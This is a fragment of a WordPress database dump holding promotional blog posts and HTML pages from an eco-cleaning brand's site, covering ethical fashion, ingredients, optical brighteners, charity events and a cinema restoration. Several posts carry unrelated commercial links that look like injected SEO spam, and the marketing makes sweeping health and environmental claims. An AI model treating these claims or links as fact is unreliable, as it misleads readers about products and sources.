period.','publish','open','open','','the-uk-hosepipe-ban','','','2017-10-17 08:49:41','2017-10-17 08:49:41','',0,'http://www.dailyjolly.co.uk/the-uk-hosepipe-ban',0,'post','',0),(45,1,'2017-10-17 08:30:51','2017-10-17 08:30:51','<h2 class=\"title\">Friends in Stylish Places</h2>\r\nIf you know your Lanvin from your Louboutin, you\'ll know that September features one of the most important events in the fashion diary: London Fashion Week (LFW). For the fifth year running, LFW\'s eco collective Estethica will once again prove that green is the new black as it showcases the best in UK ethical fashion.\r\n\r\nSince its creation by the British Fashion Council in 2006, Estethica has become the centre of ethical fashion in London. This year, the Estethica Collective will be supporting the work of 20 eco designers, all of which use fair-trade and ethical practices, organic and recycled materials to create desirable, cutting edge pieces coveted by some of the most serious fashionistas. The Estethica Collective aims to show that clothes bought from an <a href=\"https://rnd2.co/\">upcycled jacket store</a> can be just as fashionable as any newly-made piece of clothing.\r\n\r\nOne such designer is ethical pioneer and good friend of Daily, <a href=\"../../friends/ada-zanditon/\">Ada Zanditon</a>. Having worked with Ada on a number of eco projects, we\'re huge supporters of her local, ethical approach to fashion design. Ada\'s signature style centres on digitally printed patterns and sculptured, structured shapes, all created from locally sourced, sustainable materials and made with as little waste as possible. Her aim is to create clothes that are as green as they are glamorous, and her collections feature both on-trend designs and future classics. While in the past, Ada\'s pieces have been inspired by everything from bees to geometry, this year she cites her inspiration as \"seahorses, Greek goddesses and Haiti Kanaval\". We can\'t wait to catch a glimpse of her ready-to-wear collection when it hits the runway.\r\n\r\nLFW begins mid September and, along with many others, we\'re looking forward to witnessing the ethical fashion world\'s take on a new season of style. Our passion for fashion stems from a love of innovation; we\'re inspired by anyone who takes a greener approach and does things differently. Of course, it works both ways - the reason designers such as Ada love Daily is because our washing powders, liquids and conditioners are kinder to both their beloved pieces, and our beloved environment.\r\n\r\nWith such a natural fit between Daily and the fashion world, you can expect plenty more ethical fashion news to come. Watch this space!\r\n\r\n\r\n</form> ','Ada Zanditon at London Fashion Week','','publish','open','open','','ada-zanditon-at-london-fashion-week','','','2017-10-17 08:48:52','2017-10-17 08:48:52','',0,'http://www.dailyjolly.co.uk/ada-zanditon-at-london-fashion-week',0,'post','',0),(46,1,'2017-10-17 08:30:51','2017-10-17 08:30:51','You\'ve heard the phrase \'tidy home, tidy mind\'. So if your aim is to not be so stressed, or you want to keep the home in better shape, why not also kick the \'nasties\' with Daily. Now that truly is Feel Good. If you are dealing with a major home issue like a pest infestation, fear not, stress will not help you sort it out, but what will sort it out for a stress-free result is using <a href=\"https://www.pestcontrolexperts.com/local/alabama/dothan/\">pest control dothan</a> services, as an example, so you can carry on with your cleaning without the worry of an infested area. Stress-free.\r\n<div class=\"highlight blue\">\r\n\r\nTop 5 Facts:\r\n<ol>\r\n 	<li>No <a href=\"../../articles/about-ecover/\">phosphates</a></li>\r\n 	<li>No <a href=\"../../articles/optical-brighteners/\">optical brighteners</a></li>\r\n 	<li>No <a href=\"../../articles/foam-boosters/\">foam boosters</a></li>\r\n 	<li><a href=\"../../articles/fantastic-plantastic/\">Plant-based ingredients</a></li>\r\n 	<li><a href=\"../../articles/cruelty-free-products/\">Cruelty-free products</a></li>\r\n</ol>\r\nKind to you, your family and nature\r\n\r\n</div>\r\nYou may not know but many conventional brands of laundry, cleaning and homecare products contain certain chemical ingredients that can be considered a \'nasty\'.\r\n\r\nDaily products contain natural, sustainable <a href=\"../../articles/our-ingredients/\">plant-based ingredients</a> which are kinder to your family and the environment.\r\n\r\nFutile ingredients such as <a href=\"../../articles/optical-brighteners/\">optical brighteners</a>, a \'nasty\', are used in some laundry products to make your clothes appear brighter so it\'s assumed they\'re cleaner! And that\'s just one example. There are many \'nasties\' on your supermarket shelf.\r\n\r\nAs cleaning and laundry products are an essential aspect of everyone\'s day, it is important that they are kind to your skin. One way to make sure of this is by making use of eco-friendly products. There are brands like <a href=\"https://www.hudstonehome.com\">Hudstone Home</a> that you could rely on when it comes to purchasing products that are good for sensitive skin.\r\n\r\n\r\nAnother reason Daily is committed to having \'no nasties\' in our products is to save your skin from potential irritants which could cause discomfort. We are so dedicated in looking out for you that we have been accredited with the <a href=\"../../articles/sensitive-skin/\">\'Sensitive Skin\'</a> logo.\r\n\r\nDon\'t be misled by thinking that because we are skin kind and less harmful to the environment that we don\'t work. We are GHI approved which means you don\'t have to compromise with those nasties!\r\n\r\nWe can help you achieve the \'tidy home, tidy mind\' as well as keeping the tidy planet too. Now that\'s one New Year\'s resolution worth keeping.\r\n\r\nSo what are you waiting for? We\'re 3 for 2 at <a href=\"http://www.ecoverdirect.com/promotions/green-cleaning-start-to-2013.aspx?promotion=315\" target=\"_blank\" rel=\"noopener\">DailyDirect</a> to help you on your way.','Eco-friendly products contain no Nasties','','publish','open','open','','ecover-products-contain-no-nasties','','','2017-10-17 08:48:33','2017-10-17 08:48:33','',0,'http://www.dailyjolly.co.uk/ecover-products-contain-no-nasties-ecover',0,'post','',0),(47,1,'2017-10-17 08:30:51','2017-10-17 08:30:51','<h3>Calling all ethical pioneers</h3>\r\nWe\'ve been big supporters of the <a href=\"../../friends/observer-ethical-awards/\">Observer Ethical Awards</a> for a while now. Designed to recognise and reward the green pioneers and ethical innovators of the world, each year brings a raft of even more brilliant ideas and inventions from nominees.\r\n\r\nDaily are particularly proud to sponsor the Kids category; we believe it\'s important to encourage an understanding of ethical issues in the next generation of bright young things. After all, if they\'re coming up with such groundbreaking ideas now, we can only imagine what they\'ll be capable of in future.\r\n\r\nPrevious winners of the Kids category have given us the <a href=\"../../articles/bat-or-bird-box/\">BOB (Bat Or Bird) Box</a>, secret wildlife gardens and plastic recycling projects - all from the creative minds of the under 16s. And the time has come to nominate for the next round of awards.\r\n\r\n&nbsp;\r\n<h3>Nominate a great, green idea</h3>\r\nIf you\'ve had an ethical business idea, come up with an innovative invention or embarked on a project that\'s had a positive impact on your local community, or if you know a young person who has, this is your chance to shout about it. Nominate yourself (or someone else) in the Observer Ethical Awards 2018 Kids category and, if you\'re a winner, you could get £2,000 a year over three years to develop your project, courtesy of Daily.\r\n\r\nFind out more about the <a href=\"http://www.guardian.co.uk/environment/2018/jan/15/observer-ethical-awards-2018\" target=\"_blank\" rel=\"nofollow noopener\">Observer Ethical Awards 2018</a>.\r\n\r\nThis year\'s winners have just been announced:','Observer Ethical Values - Nominate your winner','','publish','open','open','','observer-ethical-values-nominate-your-winner','','','2017-10-17 08:48:13','2017-10-17 08:48:13','',0,'http://www.dailyjolly.co.uk/observer-ethical-values-nominate-your-winner',0,'post','',0),(48,1,'2017-10-17 08:30:51','2017-10-17 08:30:51','<h2 class=\"title\">Why we don\'t use brighteners</h2>\r\nMost of the washing powders and liquids you\'ll find on supermarket shelves use optical brighteners to whiten your washing. As chemical agents, optical brighteners work by absorbing ultraviolet light and turning it into visible blue light, which masks any yellowing of your clothes that can occur over time. Your clothes appear whiter and brighter (but they\'re not actually any cleaner).\r\n\r\nBy design, optical brighteners can only keep on working if they stick to the fabrics they\'ve washed. The problem is, they\'re not very discerning about what or who they stick to. If it\'s in their nature to bond to fabrics, it\'s also in their nature to bond to your skin, and they do so irreversibly. Often, it\'s not fragrances and dyes that cause skin rashes and sensitivity, but optical brighteners.\r\n\r\nAnd there\'s worse news when it comes to the environment. Many of the chemicals classed as optical brighteners can be toxic to aquatic life, and they\'ve been proven to cause mutations in bacteria. They\'re slow to biodegrade, so once they\'ve been washed away into our rivers and streams, they hang around, polluting waterways for a long time to come.\r\n\r\nWe\'ve never been lovers of optical brighteners. While they\'ve not yet been proven dangerous to humans, <strong><u>they\'ve never been proven safe</u></strong>, either. One thing we do know is that they\'re harmful to the environment, and this alone is enough of a reason to omit them from the products in our laundry range - or any of our products, full stop.\r\n\r\nWe\'re confident our products clean so effectively that we don\'t need to enhance the results with a trick of the light. We think your skin is dazzling enough without an extra coating of chemicals. And we believe the earth\'s water life is more important than a whiter-than-white wash.','Optical Brighteners','','publish','open','open','','optical-brighteners','','','2017-10-17 08:47:57','2017-10-17 08:47:57','',0,'http://www.dailyjolly.co.uk/optical-brighteners',0,'post','',0),(49,1,'2017-10-17 08:30:50','2017-10-17 08:30:50','<h2 class=\"title\">Our Ingredients</h2>\r\n<h3>What are the criteria for choosing the materials that Daily uses?</h3>\r\nDaily are committed to using plant based ingredients. By their very nature they conform to the following criteria, renewable sourcing, rapid complete bio-degradability, low aquatic toxicity and high skin tolerance.\r\n<h3>Which plant-based materials does Daily use?</h3>\r\nDaily uses plant raw materials such as herbs, starch and wood fibres (cellulose), rapeseed, palm and coconut oil, and essential oils from, for example, orange peel and other plants. These raw materials are either used directly or after they have been processed to ensure full use of the cleansing power of nature. During processing we try and remain as closely to the original raw material as possible. We call this soft chemistry. Apart from plant ingredients, we also use minerals and mineral derivatives, such as sand, lime, zeolite and silicate. These minerals are found naturally in enormous quantities (for example, 75% of the earth\'s crust consists of silicate). There is no danger of depletion and permanent damage to ecosystems during extraction of these minerals. However the extraction of petroleum, for example, is damaging and reserves are being depleted beyond repair.\r\n<h3>What are the benefits of using plant-based ingredients?</h3>\r\nThere are clear advantages to using plant-based ingredients:\r\n<ul>\r\n 	<li>there is no danger of depletion since they are produced by nature itself and are constantly replenished</li>\r\n 	<li>they are fast, simple and completely biodegradable, hence, the burden on nature is minimised, which is of additional advantage to man and animal</li>\r\n 	<li>their production only requires little energy, which means that the contribution to the greenhouse effect is reduced; Contrary to petrochemical ingredients, hardly any harmful or poorly degradable waste products are released during their production</li>\r\n 	<li>they cause no damage to the environment. This isn\'t the case during extraction, transport, refining and processing of petrochemical raw materials (think of the enormous damage done to water life, coastal areas and the local economy caused by the disaster with the Exxon Valdez)</li>\r\n 	<li>oil extraction only benefits a small group (oil sheiks, oil companies) whilst the production of plant ingredients benefits a much larger part of the population</li>\r\n</ul>','Our Ingredients','','publish','open','open','','our-ingredients','','','2017-10-17 08:49:58','2017-10-17 08:49:58','',0,'http://www.dailyjolly.co.uk/our-ingredients',0,'post','',0),(50,1,'2017-10-17 08:30:50','2017-10-17 08:30:50','<h1>Jacob talks about plastics, Daily and this year\'s Blue Mile event!!</h1>\r\n<strong>The Daily Blue Mile\'s best known supporter, Jacob, talks about why he loves the event so much and what we can all do to ensure our oceans have a brighter future.</strong>\r\n\r\nWhen it comes to oceans there\'s not much that Daily Blue Mile Ambassador Jacob hasn\'t done. He is one of the most pre-eminent divers on the world today, supporting and leading scientific missions with the aim of protecting the marine environment. We caught up with Paul and asked him about his current projects.\r\n\r\n\"I\'ve been working very hard on ocean debris,\" said Paul. \"From a consumer point of view, we can all do a lot to help - by becoming aware of the issue and by looking at what we do in our daily lives in terms of disposing of our waste. Each of us can make an enormous difference.\"\r\n\r\n\"And I really do believe that the future is brighter for the oceans, too. The solutions that are coming up, particularly from the next generation, are really, really creative. Daily for example, is providing leadership with innovations <a href=\"../../message-in-our-bottle/\">in their plastics projects</a>, which is of enormous benefit to us all.\"\r\n\r\n\"I love the sea and in fact... I\'m a huge supporter of the <a href=\"http://www.thebluemile.org/\" target=\"_blank\" rel=\"noopener\">Daily Blue Mile</a>. Firstly, it\'s fun! And I think you can capture people\'s imagination. It\'s also challenging without being out of anybody\'s reach and you can do it in a number of different ways - by swimming, stand up paddling or kayaking the Blue Mile.\"\r\n\r\nPaul is taking part in the Corporate Team Challenge for the Daily Blue Mile team, doing the kayaking over a one mile course off Plymouth\'s Barbican on the Saturday afternoon of the two-day event. That evening, he\'ll be delivering a few words at the Gala Dinner at the Boathouse Café, a fundraising event for the Daily Blue Mile\'s chosen charity, the Marine Conservation Society.','Discussing plastics with Jacob','Jacob talks about plastics,  and this year\'s Blue Mile event!!!','publish','open','open','','discussing-plastics-with-jacob','','','2017-10-17 08:50:30','2017-10-17 08:50:30','',0,'http://www.dailyjolly.co.uk/paul-rose-and-the-ecover-blue-mile',0,'post','',0),(51,1,'2017-10-17 08:30:50','2017-10-17 08:30:50','<h2 class=\"title\">Launching the Rainbow Warrior III</h2>\r\nIn July 1985, Greenpeace\'s converted fishing trawler \'The Rainbow Warrior\' was on its way to Moruroa, French Polynesia, in the Pacific Ocean - an area that had suffered nuclear testing at the hands of the French since 1962. Greenpeace sailed The Rainbow Warrior to the island in order to bear witness to the ecological destruction of nuclear testing first-hand. Residents of the neighbouring Marshall Islands had already been relocated by Greenpeace, having been blighted by cancer, leukaemia and birth defects.\r\n\r\nThe mere presence of Greenpeace and their intention to expose the effects of nuclear testing posed such a threat that the French Government felt it necessary to take action; they did so by ordering the French Secret Service to bomb The Rainbow Warrior.\r\n<h3>\"You can\'t sink a rainbow\"</h3>\r\nThe bombing caused worldwide outrage, not least because tragically one crew member was killed. When the truth was revealed, the French Minister for Defence was forced to resign and the United Nations stepped in. The Rainbow Warrior became an icon - a symbol not only of Greenpeace, but of the power of protest. The slogan \"You Can\'t Sink A Rainbow\" was coined.\r\n\r\n26 years later, while the original Rainbow Warrior lies at the bottom of the Pacific slowly turning into a living reef, and it\'s successor the Rainbow Warrior II has been retired to serve as a hospital ship in Bangladesh, a new, purpose built Rainbow Warrior III is about to be revealed.\r\n\r\nDesigned with sustainability in mind, the Rainbow Warrior III is the most environmentally advanced ship of its size, and it represents the realisation of a dream come true for many of Greenpeace\'s seafaring crew. The 60m long boat is powered primarily by sails hoisted onto two 50ft masts, switching to a state-of-the-art hybrid engine when needed. Every component from materials to paint and insulation has been sourced ethically and cupboards will be stocked with Daily products enabling crew to wash, wipe, scour and scrub with minimal impact on the environment. Thanks to the latest technology, the boat has the ability to drop speedboats from its sides in record time for a quick approach or getaway. A helicopter pad can be created above deck, and the vessel features a radio room built with reinforced doors that will allow a further 30 minutes transmission time should the vessel be boarded by anyone wishing to disrupt proceedings. Clearly, The Rainbow Warrior III is a boat that means business.','Rainbow Warrior III','','publish','open','open','','rainbow-warrior-iii','','','2017-10-17 08:51:08','2017-10-17 08:51:08','',0,'http://www.dailyjolly.co.uk/rainbow-warrior-iii',0,'post','',0),(52,1,'2017-10-17 08:30:50','2017-10-17 08:30:50','<div class=\"content\">\r\n<h2 class=\"title\">A clearer label makes recycling easier than ever</h2>\r\nEver found yourself in a tizz about what you can and can\'t recycle? We know how you feel! With so much different packaging around these days, you almost need a science degree to know what\'s what.\r\n\r\n<strong>Fortunately, the Waste and Resources Action Programme (WRAP) has come to the rescue with an easy to read, straightforward recycling label.</strong>\r\nA bit like the nutrition wheel you see on food packets, the WRAP label offers a clear explanation about which parts of the packaging can be recycled and which parts should go out with the other rubbish.\r\n\r\nAny company can choose to use the WRAP label on its products, and Daily are excited to be a keen participant in the scheme. It\'s our way of making Daily lovers\' lives just a little bit easier.\r\n<div class=\"clear\"></div>\r\nHere\'s the label in all its simple, understated glory, and what it means to you:\r\n\r\n&nbsp;\r\n\r\nWe love the new label because it means companies have to be honest about every part of their packaging.\r\n\r\nIt keeps things simple. Recycle away!\r\n\r\n</div>','Recycling labels','','publish','open','open','','recycling-labels','','','2017-10-17 08:51:32','2017-10-17 08:51:32','',0,'http://www.dailyjolly.co.uk/recycling-labels',0,'post','',0),(53,1,'2017-10-17 08:30:44','2017-10-17 08:30:44','<h2 class=\"title\">The Big Clean Up - Restoring The Regal</h2>\r\nWhen The Regal cinema first opened its doors in 1932, it provided the people of Evesham with more than just a place to woo their intended on Saturday nights; it gave cinema lovers of all ages the chance to escape into a world of daring adventures, epic battles and thrilling mysteries, served with a popcorn-bucket full of Hollywood glamour.\r\n\r\nThroughout the movie industry\'s heyday, The Regal could seat over 1,000 and drew in a crowd of more than a million every year. Over time, it became a central part of the local community and earned its place in Evesham\'s history books. From usherettes and projectionists who worked the screens to visitors who met their wartime sweethearts, the venue holds many fond memories for the locals.\r\n\r\nSadly, as modern multiplexes lured filmgoers away with the promise of blockbusters and big screens, The Regal\'s popularity dwindled and it was forced to close its doors in 2003. For over 6 years the projectors lay silent and the silver screens featureless... until father-and-son team Ian and Laurence Wiper decided it was time to make The Regal worthy of its name once more.\r\n\r\nA real labour of love, the project would be a costly undertaking not without its hurdles. But before they could assess the true scale of the improvements needed, a good old-fashioned clean up was required. They turned to Daily to remove the years of grime that now covered the walls and surfaces, and Emma Bennetts (our very own brand manager) jumped at the chance to help. \"When we heard about the project we were really excited that our products were being used by the team at The Regal Cinema to preserve such an important part of the interior,” she explained.\r\n\r\nWorkers at The Regal had discovered that Daily products were powerful enough to get rid of the dirt and dust, yet gentle enough to preserve the original features, such as the art deco wallpaper and woodwork. While our first thought was to donate our products to the cause, we knew we could do more... so we decided to roll up our sleeves and get stuck into \'The Big Clean Up\'.\r\n\r\nAlongside some willing volunteers, all armed with Daily sprays and cleaning equipment, aprons and protective clothing, we scrubbed, brushed, washed and wiped away the grime; over 40 years of nicotine stains were cleaned from the walls in preparation for the next phase of development. According to Laurence Wiper, \"The cleaning event made a massive difference and about one third of the wall space is now ready for painting, which isn\'t bad for one day. If we didn\'t have these volunteers to help us we would be looking at a fortnight\'s worth of work.\"\r\n\r\nThe restoration project is ongoing and with every week that passes The Regal is being revived. In 2009, Alistair McGowan became a patron, raising both the profile of the project, and some much needed funds with a gig show entitled \'The Regal Big Weekend\'. And thanks to a recent £2million investment from Wychavon Council, this famed venue is set take its place at the heart of Evesham\'s community once again. Much more than just a cinema, at The Regal you\'ll be able to meet for a coffee or a pre-show drink, see live music and performance, take in an art exhibition or dine in style in its rooftop restaurant.\r\n\r\nAt Daily, we were delighted to offer a helping hand to such a deserving, community-led project. As Emma puts it, \"We thought it was fantastic that the local community is right behind the restoration of the venue for people to enjoy once again\". So if you\'re ever near Evesham, make sure you stop by; there\'s no finer place to catch a film.\r\n<div class=\"share-this\"></div>\r\n<div id=\"inner-footer\"></div>\r\n&nbsp;','Regal Cinema','','publish','open','open','','regal-cinema','','','2017-10-17 08:51:44','2017-10-17 08:51:44','',0,'http://www.dailyjolly.co.uk/regal-cinema',0,'post','',0),(54,1,'2017-10-17 08:30:44','2017-10-17 08:30:44','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/sensitive-skin\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section cleaning-with-care-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/sensitive-skin/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">Saving your skin</h2>\n														<p>\n                                                            If you have sensitive skin, it can take time to find products that agree with you.\n														</p>\n														<p>\n                                                            One of the most sensible places to start is with your washing powder and cleaning products. Your clothes are in direct contact with your skin throughout the day, along with the potentially irritating chemicals they\'ve been washed in. You spend time with your hands in soapy dishwater probably at least once a day, and you squirt, wipe and wash with cleaning solutions regularly. Choosing products, like Daily, which contain as few potential irritants as possible can make life much more comfortable.\n														</p>\n														<h3>\n                                                            How Daily can help\n														</h3>\n														<p>\n                                                            At Daily, our plant-based and mineral ingredients are carefully chosen in order to be kind to even sensitive skin, hence our new \'Sensitive Skin\' logo:\n														</p>\n														\n														<p>\n                                                            We know this because a recent study carried out by independent dermatologists proved it. They took a panel of 22 men and women with sensitive skin, and asked them to use Daily laundry and dish-washing products for three weeks. The dermatologists kept a close eye on the participants\' skin and recorded any abnormalities, while the participants themselves gave scores against criteria such as irritation, redness and itching. The results? Daily passed with flying colours!\n														</p>\n														<p>\n                                                            While we know from your feedback that many of you with sensitive skin prefer our products over others, it\'s nice to finally see it proven. The \'Sensitive Skin\' logo tells you that dermatologists have declared our products suitable for sensitive skin; a fact we hope will make it easier for those trying to find a solution to the misery of itching and irritation.\n														</p>\n														<p>\n                                                            Currently the logo appears on:\n														</p>\n                                                        <ul>\n                                                            <li>Washing Up Liquid Lemon &amp; Aloe</li>\n                                                            <li>Washing Up Liquid Camomile &amp; Marigold</li>\n                                                            <li>Washing Up Liquid Grapefruit &amp; Green Tea</li>\n                                                            <li>Washing Up Liquid Pomegranate &amp; Lime</li>\n                                                            <li>Laundry Liquid Concentrated Biological</li>\n                                                            <li>Laundry Liquid Concentrated Non Biological</li>\n                                                            <li>Laundry Liquid Regular</li>\n                                                            <li>Fabric Softener Amongst the Flowers</li>\n                                                            <li>Fabric Softener Under the Sun</li>\n                                                            <li>Delicate</li>\n                                                            <li>Washing Powder Non-Biological</li>\n                                                            <li>Washing Powder Biological</li>\n                                                            <li>Washing Powder Fragrance Free - Non Bio</li>\n                                                        </ul>\n														\n													</div>\n												</div>\n                          </div>\n                          <div id=\"sidebar\">\n                            <div class=\"tabset-wrapper\">\n                              <div class=\"tabset-holder\">\n                                <div class=\"b\">\n														</div>\n													</div>\n												</div>\n											</div>\n										</div>\n									</div>\n								</div>\n								<div class=\"box-b\"></div>\n							</div>\n						</div>\n												<div id=\"inner-footer\">\n							<div class=\"footer-section\">\n								<div class=\"t\"></div>\n								\n								<div class=\"b\"></div>\n							</div>\n							<div class=\"bottom-panel contrast\"></div>\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Sensitive Skin','','publish','open','open','','sensitive-skin','','','2017-10-17 08:30:44','2017-10-17 08:30:44','',0,'http://www.dailyjolly.co.uk/sensitive-skin',0,'post','',0),(55,1,'2017-10-17 08:30:44','2017-10-17 08:30:44','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n	<meta name=\"description\" content=\" Stain Remover tackles stains like mud, sweat and blood on your whites and colourfast clothes. It\'s liquid formula comes with a handy dispenser.\"/>\n    <meta property=\"og:url\" content=\"http://www.the-splash.co.uk/articles/stain-removal\"/>\n    <meta property=\"og:title\" content=\"The Secret to Powerful Stain Removal\"/>\n    <meta property=\"og:description\" content=\" Stain Remover tackles stains like mud, sweat and blood on your whites and colourfast clothes. It\'s liquid formula comes with a handy dispenser.\"/>\n    <meta property=\"og:image\" content=\"http://www.the-splash.co.uk/images/articles/stain-fb.jpg\"/>\n	<link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/stain-removal\">\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/article-comments.css\" media=\"screen\"/>\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jqueryui/1.10.3/jquery-ui.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.6.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.6.css\" media=\"screen\"/>\n    <link href=\"//http://fonts.googleapis.com/css?family=Open+Sans Condensed:300italic,300,700\" rel=\"stylesheet\" type=\"text/css\">\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n  var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://\' : \'http://\') + \'stats.g.doubleclick.net/dc.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section facts-about-ecover-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/stain-removal/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n												  <div class=\"content\">\n														<h1>The Secret to Powerful Stain Removal</h1>\n														<br/>\n													  <p>\n                                                            <strong>Our products are designed to be both powerful and kind to your clothes. <a onclick=\"return t2(\'offsite\', this.href, \'click on top product link\');\" href=\"http://www.ecoverdirect.com/products/stain-remover/estainremover200ml.aspx?productid=estainremover200ml\" target=\"_blank\">Daily Stain Remover</a> is no exception! Being convenient and easy to apply, the stain remover becomes an essential part of the daily <a href=\"../../wear-and-care/\">wear &amp; care</a> of your clothes.</strong>\n                                                        </p>\n                                                        <h3>How it works?</h3>\n														<p>\n                                                            Our stain remover is an essential weapon when taking on the laundry pile. With it\'s built in brush, you simply target those grubby spots or something slightly more sinister to give you that extra dose of cleaning muscle.\n                                                        </p>\n												    <p>\n                                                            Daily\'s brilliant formulation is safe to 